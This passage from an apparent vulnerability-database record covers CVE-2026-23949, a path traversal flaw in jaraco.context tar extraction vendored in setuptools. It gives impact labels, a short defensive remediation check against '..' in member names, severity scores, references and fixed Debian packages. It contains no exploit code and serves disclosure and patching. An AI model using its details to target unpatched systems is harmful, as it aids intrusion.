- Privesc (LOW exploitability)
- Supply-Chain attack (VARIABLE exploitability) - relevant to the first point.

### Remediation

I guess removing the custom filter is not feasible given the backward compatibility issues that might come up you can use a safer filter `strip_first_component` that skips or sanitizes `../` character sequences since it is already there eg.
```
if member.name.startswith('/') or '..' in member.name:
  raise ValueError(f\"Attempted path traversal detected: {member.name}\")
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23949.json

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23949.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-23949

reference_id

reference_type

scores

value	0.00091
scoring_system	epss
scoring_elements	0.25664
published_at	2026-04-21T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25688
published_at	2026-04-18T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25705
published_at	2026-04-16T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25702
published_at	2026-04-13T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.2576
published_at	2026-04-12T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25802
published_at	2026-04-11T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25792
published_at	2026-04-09T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25744
published_at	2026-04-08T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25672
published_at	2026-04-07T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25902
published_at	2026-04-04T12:55:00Z

value	0.00091
scoring_system	epss
scoring_elements	0.25858
published_at	2026-04-02T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-23949

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/jaraco/jaraco.context

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/jaraco/jaraco.context

reference_url

https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/

url

https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91

reference_url

https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/

url

https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9

reference_url

https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/

url

https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2

reference_url

https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/

url

https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-23949

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-23949

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126078
reference_id	1126078
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126078

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126729
reference_id	1126729
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126729

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2431026
reference_id	2431026
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2431026

reference_url

https://github.com/advisories/GHSA-58pv-8j8x-9vj2

reference_id

GHSA-58pv-8j8x-9vj2

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-58pv-8j8x-9vj2

reference_url	https://usn.ubuntu.com/7979-1/
reference_id	USN-7979-1
reference_type
scores
url	https://usn.ubuntu.com/7979-1/

fixed_packages

url	pkg:deb/debian/setuptools@0?distro=trixie
purl	pkg:deb/debian/setuptools@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@0%3Fdistro=trixie

url	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie

url	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
purl	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie

aliases CVE-2026-23949, GHSA-58pv-8j8x-9vj2

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v6y5-h7b6-3qda

Risk_score null

Resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie

Package Instance